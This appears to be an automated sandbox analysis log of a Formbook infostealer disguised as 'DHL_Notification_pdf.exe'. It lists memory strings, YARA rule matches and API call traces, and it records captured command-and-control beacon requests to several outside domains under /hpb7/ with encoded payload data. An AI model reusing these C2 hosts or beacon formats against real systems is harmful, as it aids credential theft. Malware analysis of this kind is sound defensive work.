Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.madliainsalu.com/hpb7/
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.madliainsalu.comReferer:
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mindsetlighting.xyz
Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mindsetlighting.xyz/hpb7/
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.mindsetlighting.xyzReferer:
Source: explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rifleroofers.com
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rifleroofers.com/hpb7/
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.rifleroofers.comReferer:
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.traindic.top
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.traindic.top/hpb7/
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.yongleproducts.com
Source: explorer.exe, 00000004.00000003.462535440.0000000007D57000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.521082360.0000000007D45000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.yongleproducts.com/hpb7/
Source: cmmon32.exe, 00000005.00000002.509147113.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.yongleproducts.com/hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=qNzMMFnF92wYqby
Source: 146E771M.5.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 146E771M.5.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 146E771M.5.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 146E771M.5.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: cmmon32.exe, 00000005.00000003.381521454.0000000007C36000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.kunimi.orgConnection: closeContent-Length: 193Cache-Control: no-cacheOrigin: http://www.kunimi.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kunimi.org/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 67 6f 4d 41 72 32 3d 47 75 61 75 64 39 45 4f 77 48 76 76 68 62 77 68 55 70 32 5f 62 59 48 39 4f 65 73 6d 4f 5a 6c 61 76 33 55 61 6d 59 76 44 30 34 4c 4d 49 46 6d 4b 37 6a 61 33 72 71 57 59 66 61 6f 53 34 41 7a 58 48 5a 6c 72 54 63 71 45 75 65 68 32 70 50 69 6a 67 35 4e 71 62 74 42 72 79 38 78 4a 38 52 71 56 4a 7a 7a 39 58 33 43 2d 69 69 33 4f 56 4f 4d 48 6a 67 4d 72 61 51 59 64 79 70 39 4d 28 43 33 37 52 2d 42 49 50 47 33 5a 4d 5a 73 6b 6f 73 6b 4f 5a 63 71 39 38 58 43 52 6c 6d 31 4f 38 4f 4a 49 68 52 6d 6b 33 2d 62 70 38 4d 73 30 7a 41 28 4d 62 67 79 61 5a 5f 59 2e 00 00 00 00 00 00 00 00 Data Ascii: pgoMAr2=Guaud9EOwHvvhbwhUp2_bYH9OesmOZlav3UamYvD04LMIFmK7ja3rqWYfaoS4AzXHZlrTcqEueh2pPijg5NqbtBry8xJ8RqVJzz9X3C-ii3OVOMHjgMraQYdyp9M(C37R-BIPG3ZMZskoskOZcq98XCRlm1O8OJIhRmk3-bp8Ms0zA(MbgyaZ_Y.
Source: unknown DNS traffic detected: queries for: www.yongleproducts.com
Source: global traffic HTTP traffic detected: GET /hpb7/?pgoMAr2=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnfQOgdZDSA0ZYkxsRLP7vho3iJ&MWgiD_=Gt_IudmBZP HTTP/1.1Host: www.0dhy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIbedtv8fxp/SmPPkaBaUqgtGDC HTTP/1.1Host: www.kunimi.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?pgoMAr2=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7dLaG3D1YJBFes4W4zIdoETPhG&MWgiD_=Gt_IudmBZP HTTP/1.1Host: www.traindic.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0h38HiNDm4XeyJxX5vlkTTrS1xP HTTP/1.1Host: www.bohndigitaltech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?pgoMAr2=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPCikRZslZ7vUOEqSXS/sLR9FgE&MWgiD_=Gt_IudmBZP HTTP/1.1Host: www.rifleroofers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?MWgiD_=Gt_IudmBZP&pgoMAr2=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/MT4aa5FcMBKGUU6DgJQXharGK HTTP/1.1Host: www.denko-kosan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405809

E-Banking Fraud

Source: Yara match File source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: initial sample Static PE information: Filename: DHL_Notification_pdf.exe
Source: DHL_Notification_pdf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.ldndbi.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.ldndbi.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403640
Source: C:\Users\user\Desktop\DHL_Notification_pdf.exe Code function: 0_2_00406D5F 0_2_00406D5F
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 1_2_00410371 1_2_00410371
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00405843 3_2_00405843
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00401801 3_2_00401801
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00401803 3_2_00401803
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00401810 3_2_00401810
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_004038C3 3_2_004038C3
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_004228C4 3_2_004228C4
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_004230E8 3_2_004230E8
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_004038B9 3_2_004038B9
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0042219B 3_2_0042219B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00401A65 3_2_00401A65
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00422211 3_2_00422211
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00421A8C 3_2_00421A8C
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00401BA0 3_2_00401BA0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_004223BA 3_2_004223BA
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00401CA5 3_2_00401CA5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00401CB0 3_2_00401CB0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0040561A 3_2_0040561A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00420623 3_2_00420623
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00405623 3_2_00405623
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00422EAB 3_2_00422EAB
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0040BFEE 3_2_0040BFEE
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0040BFF3 3_2_0040BFF3
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00421F81 3_2_00421F81
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A420A0 3_2_00A420A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE20A8 3_2_00AE20A8
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2B090 3_2_00A2B090
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE28EC 3_2_00AE28EC
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AEE824 3_2_00AEE824
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1002 3_2_00AD1002
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A34120 3_2_00A34120
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1F900 3_2_00A1F900
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE22AE 3_2_00AE22AE
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4EBB0 3_2_00A4EBB0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADDBD2 3_2_00ADDBD2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE2B28 3_2_00AE2B28
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2841F 3_2_00A2841F
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADD466 3_2_00ADD466
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A42581 3_2_00A42581
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2D5E0 3_2_00A2D5E0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE25DD 3_2_00AE25DD
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A10D20 3_2_00A10D20
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE2D07 3_2_00AE2D07
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE1D55 3_2_00AE1D55
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE2EF7 3_2_00AE2EF7
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A36E30 3_2_00A36E30
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADD616 3_2_00ADD616
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE1FF1 3_2_00AE1FF1
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AEDFCE 3_2_00AEDFCE
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: String function: 00A1B150 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: String function: 004019C0 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041E533 NtCreateFile, 3_2_0041E533
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041E5E3 NtReadFile, 3_2_0041E5E3
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041E663 NtClose, 3_2_0041E663
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041E713 NtAllocateVirtualMemory, 3_2_0041E713
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041E52E NtCreateFile, 3_2_0041E52E
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_0041E5DD NtReadFile, 3_2_0041E5DD
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A598F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_00A598F0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00A59860
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59840 NtDelayExecution,LdrInitializeThunk, 3_2_00A59840
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A599A0 NtCreateSection,LdrInitializeThunk, 3_2_00A599A0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_00A59910
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A59A20 NtResumeThread,LdrInitializeThunk, 3_2_00A59A20
